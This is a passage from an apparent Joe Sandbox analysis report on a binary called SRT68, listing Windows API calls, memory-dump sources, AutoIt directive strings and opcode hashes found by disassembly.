                                                                      • GetKeyboardState.USER32(?), ref: 01000DBA
                                                                      • SetKeyboardState.USER32(?), ref: 01000E1B
                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01000E47
                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01000E64
                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 01000EA8
                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 01000EC9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsncpy$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 2945705084-0
                                                                      • Opcode ID: 6ed4c51d9ae0466b7589a3c108e0e8263567a11c3af033d153d3a3c120c6c46a
                                                                      • Instruction ID: 91977aee791a2e7c879593fb8ea430bbc4009b1ffd8f86a93264e39ac75395f1
                                                                      • Opcode Fuzzy Hash: 6ed4c51d9ae0466b7589a3c108e0e8263567a11c3af033d153d3a3c120c6c46a
                                                                      • Instruction Fuzzy Hash: 6A41E765C5020976DB11EBB48C47ECFB7B8AF04350F40885AE649E3161EB38A745D7A6
                                                                      APIs
                                                                        • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01003697,?), ref: 0100468B
                                                                        • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01003697,?), ref: 010046A4
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 010036B7
                                                                      • _wcscmp.LIBCMT ref: 010036D3
                                                                      • MoveFileW.KERNEL32(?,?), ref: 010036EB
                                                                      • _wcscat.LIBCMT ref: 01003733
                                                                      • SHFileOperationW.SHELL32(?), ref: 0100379F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 1377345388-1173974218
                                                                      • Opcode ID: bba8fcac64c4c6c57f402a4f4389ccac3eeba5418412ad7c5c0ee18d30b9234e
                                                                      • Instruction ID: 76ee8ee813b8757e906c3c87652b27bd48d18dd021c60cc8e887d8821d5e95f3
                                                                      • Opcode Fuzzy Hash: bba8fcac64c4c6c57f402a4f4389ccac3eeba5418412ad7c5c0ee18d30b9234e
                                                                      • Instruction Fuzzy Hash: D5418171508345AEE763EF64D841ADF77E8BF89280F00486EF5C9C7291EA34D289C756
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 010272AA
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01027351
                                                                      • IsMenu.USER32(?), ref: 01027369
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010273B1
                                                                      • DrawMenuBar.USER32 ref: 010273C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                      • String ID: 0
                                                                      • API String ID: 3866635326-4108050209
                                                                      • Opcode ID: 7245e04596cfb0afbc72bcc73e35fb371b9f8bea107546bd3c62dc256709a60e
                                                                      • Instruction ID: 92bbbfb3f10fb5ee84cae0c7c95f1bb8f9b51bd00b89700fd07be54b563e0806
                                                                      • Opcode Fuzzy Hash: 7245e04596cfb0afbc72bcc73e35fb371b9f8bea107546bd3c62dc256709a60e
                                                                      • Instruction Fuzzy Hash: 94415975A00219EFDB20DF54D885E9ABBF8FF18350F14846AFE85A7250D735A950CF90
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01020FD4
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01020FFE
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 010210B5
                                                                        • Part of subcall function 01020FA5: RegCloseKey.ADVAPI32(?), ref: 0102101B
                                                                        • Part of subcall function 01020FA5: FreeLibrary.KERNEL32(?), ref: 0102106D
                                                                        • Part of subcall function 01020FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01021090
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 01021058
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      • Opcode ID: 266be0fa80e03cf6a510419b680e89c58e060a321a59e5d3a136ed9d2a094cb2
                                                                      • Instruction ID: 2823c93cc58bc2b9ac2b89299de36bd8496ca53a1a4be617295831917afd6201
                                                                      • Opcode Fuzzy Hash: 266be0fa80e03cf6a510419b680e89c58e060a321a59e5d3a136ed9d2a094cb2
                                                                      • Instruction Fuzzy Hash: F7310F71A01119BFEB659F94D8C9EFFBBBCEF08340F1001A9F645A2140DA795A459BA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010262EC
                                                                      • GetWindowLongW.USER32(015855C0,000000F0), ref: 0102631F
                                                                      • GetWindowLongW.USER32(015855C0,000000F0), ref: 01026354
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01026386
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010263B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 010263C1
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010263DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: 52600ac454b4c3fb1cbb352227911a97d320ea2e388b484f08ec69a5ba74ce41
                                                                      • Instruction ID: a0cd9cc8f516fa830dcf4a04641b0e5f4e5b8e5cecf17d0401e1a6171c96aecf
                                                                      • Opcode Fuzzy Hash: 52600ac454b4c3fb1cbb352227911a97d320ea2e388b484f08ec69a5ba74ce41
                                                                      • Instruction Fuzzy Hash: DC310730644161AFDB31CF28D888F553BE5FB4A754F1941A4F9819F2B6CB77A840CB91
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDB2E
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDB54
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FFDB57
                                                                      • SysAllocString.OLEAUT32(?), ref: 00FFDB75
                                                                      • SysFreeString.OLEAUT32(?), ref: 00FFDB7E
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FFDBA3
                                                                      • SysAllocString.OLEAUT32(?), ref: 00FFDBB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 5d805c77e6d0c8c1b1ef1887d1e4c5a6186e3f47f8e421eff47cfd37780e0894
                                                                      • Instruction ID: 6c98e479e9498a9b34798d622ea77d7696d21af411ecbaeb46109a8a44e69b6d
                                                                      • Opcode Fuzzy Hash: 5d805c77e6d0c8c1b1ef1887d1e4c5a6186e3f47f8e421eff47cfd37780e0894
                                                                      • Instruction Fuzzy Hash: 8421A63260121EAFDF20DEA8DC48DBB73ADEF49360B118125FB54DB260DB749C419760
                                                                      APIs
                                                                        • Part of subcall function 01017D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01017DB6
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010161C6
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010161D5
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0101620E
                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 01016217
                                                                      • WSAGetLastError.WSOCK32 ref: 01016221
                                                                      • closesocket.WSOCK32(00000000), ref: 0101624A
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01016263
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 910771015-0
                                                                      • Opcode ID: 6b9f615879f345096546bf2b793a4c2097df736c8fcc79e97caea2fc4a3ade2d
                                                                      • Instruction ID: e44cc9e17ddb805c9d592ac74007e8f52cec98289fd4f32f8f32af409a4e0de8
                                                                      • Opcode Fuzzy Hash: 6b9f615879f345096546bf2b793a4c2097df736c8fcc79e97caea2fc4a3ade2d
                                                                      • Instruction Fuzzy Hash: 6731A171600118ABEF20AF64CC85BBE7BF9EF45750F044069FD85E7285CBB9A9049BA1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 1038674560-2734436370
                                                                      • Opcode ID: a62855bba46d9595b821556fc873fbf8f8c86de1273cdd547400aab5d8691f4a
                                                                      • Instruction ID: 34ace9235c638d792dbf6dc840b31eceb992e276c6fc6802969d22c40a5dfed0
                                                                      • Opcode Fuzzy Hash: a62855bba46d9595b821556fc873fbf8f8c86de1273cdd547400aab5d8691f4a
                                                                      • Instruction Fuzzy Hash: 8F2149736141166AD320BA34AD03FB7B398DF55360F14403DF686CA171EF949D4AF295
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDC09
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDC2F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FFDC32
                                                                      • SysAllocString.OLEAUT32 ref: 00FFDC53
                                                                      • SysFreeString.OLEAUT32 ref: 00FFDC5C
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FFDC76
                                                                      • SysAllocString.OLEAUT32(?), ref: 00FFDC84
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 86dec8c68d856579fb26196d6dd8e786a65a6e9e21003a97e616f70679182d7e
                                                                      • Instruction ID: 11f520a9d4a581ef7f1d8862194e8675121918c7e6944f2019cdf7065ce80097
                                                                      • Opcode Fuzzy Hash: 86dec8c68d856579fb26196d6dd8e786a65a6e9e21003a97e616f70679182d7e
                                                                      • Instruction Fuzzy Hash: 30218636604209AFDB20EFA8DC89DBA77EDEF09360B108125FA54CB264DBB4DC41D764
                                                                      APIs
                                                                        • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                        • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                        • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01027632
                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0102763F
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0102764A
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01027659
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01027665
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: af596ec0d20bacf68e760ba9de4db96d817c00f554102dcb92c7e3cb5ae47068
                                                                      • Instruction ID: 258b1657aef3fd019504b4574eb3f18b552b0a85395112dc721080bcd1c60927
                                                                      • Opcode Fuzzy Hash: af596ec0d20bacf68e760ba9de4db96d817c00f554102dcb92c7e3cb5ae47068
                                                                      • Instruction Fuzzy Hash: D11193B111012ABFEF258E64CC85EE7BF6DEF08798F014114FA44A6050C6729C21DBA4
                                                                      APIs
                                                                      • __init_pointers.LIBCMT ref: 00FC9AE6
                                                                        • Part of subcall function 00FC3187: EncodePointer.KERNEL32(00000000), ref: 00FC318A
                                                                        • Part of subcall function 00FC3187: __initp_misc_winsig.LIBCMT ref: 00FC31A5
                                                                        • Part of subcall function 00FC3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FC9EA0
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FC9EB4
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FC9EC7
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FC9EDA
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FC9EED
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FC9F00
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FC9F13
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FC9F26
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FC9F39
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FC9F4C
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FC9F5F
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FC9F72
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FC9F85
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FC9F98
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FC9FAB
                                                                        • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FC9FBE
                                                                      • __mtinitlocks.LIBCMT ref: 00FC9AEB
                                                                      • __mtterm.LIBCMT ref: 00FC9AF4
                                                                        • Part of subcall function 00FC9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FC9AF9,00FC7CD0,0105A0B8,00000014), ref: 00FC9C56
                                                                        • Part of subcall function 00FC9B5C: _free.LIBCMT ref: 00FC9C5D
                                                                        • Part of subcall function 00FC9B5C: DeleteCriticalSection.KERNEL32(0105EC00,?,?,00FC9AF9,00FC7CD0,0105A0B8,00000014), ref: 00FC9C7F
                                                                      • __calloc_crt.LIBCMT ref: 00FC9B19
                                                                      • __initptd.LIBCMT ref: 00FC9B3B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00FC9B42
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                      • String ID:
                                                                      • API String ID: 3567560977-0
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FC3F85), ref: 00FC4085
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FC408C
                                                                      • EncodePointer.KERNEL32(00000000), ref: 00FC4097
                                                                      • DecodePointer.KERNEL32(00FC3F85), ref: 00FC40B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                      • String ID: RoUninitialize$combase.dll
                                                                      • API String ID: 3489934621-2819208100
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 3253778849-0
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010202BD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010202FD
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01020320
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01020349
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0102038C
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 01020399
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                      • String ID:
                                                                      • API String ID: 4046560759-0
                                                                      APIs
                                                                      • GetMenu.USER32(?), ref: 010257FB
                                                                      • GetMenuItemCount.USER32(00000000), ref: 01025832
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0102585A
                                                                      • GetMenuItemID.USER32(?,?), ref: 010258C9
                                                                      • GetSubMenu.USER32(?,?), ref: 010258D7
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 01025928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
